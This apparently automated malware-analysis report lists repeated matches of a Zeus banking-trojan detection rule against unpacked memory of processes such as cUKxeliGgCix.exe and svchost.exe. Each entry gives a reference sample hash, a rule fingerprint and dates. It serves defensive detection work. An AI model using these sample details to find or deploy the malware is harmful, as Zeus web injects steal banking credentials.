    Source: 35.2.cUKxeliGgCix.exe.20c0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 25.2.cUKxeliGgCix.exe.892000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 21.2.cUKxeliGgCix.exe.22d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 27.2.cUKxeliGgCix.exe.1590000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 15.2.cUKxeliGgCix.exe.2482000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.cUKxeliGgCix.exe.23f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.cUKxeliGgCix.exe.2e42000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.cUKxeliGgCix.exe.3100000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.88e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 27.2.cUKxeliGgCix.exe.1590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 35.2.cUKxeliGgCix.exe.2062000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.5AFlyarMds.exe.6ff110.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.cUKxeliGgCix.exe.2f60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.cUKxeliGgCix.exe.1272000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2c90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.406400.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 33.2.cUKxeliGgCix.exe.3152000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.42.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 19.2.cUKxeliGgCix.exe.2910000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 37.2.cUKxeliGgCix.exe.2d32000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 15.2.cUKxeliGgCix.exe.24e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.cUKxeliGgCix.exe.fe2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2a06c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
